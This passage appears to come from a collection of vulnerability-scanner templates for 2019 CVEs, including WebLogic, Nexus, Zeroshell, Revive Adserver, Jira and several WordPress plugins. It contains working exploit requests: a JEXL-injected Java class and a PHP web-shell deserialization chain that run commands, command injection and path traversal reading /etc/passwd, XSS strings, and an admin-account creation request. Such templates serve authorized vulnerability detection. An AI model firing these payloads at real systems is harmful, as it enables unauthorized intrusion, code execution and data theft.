index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File 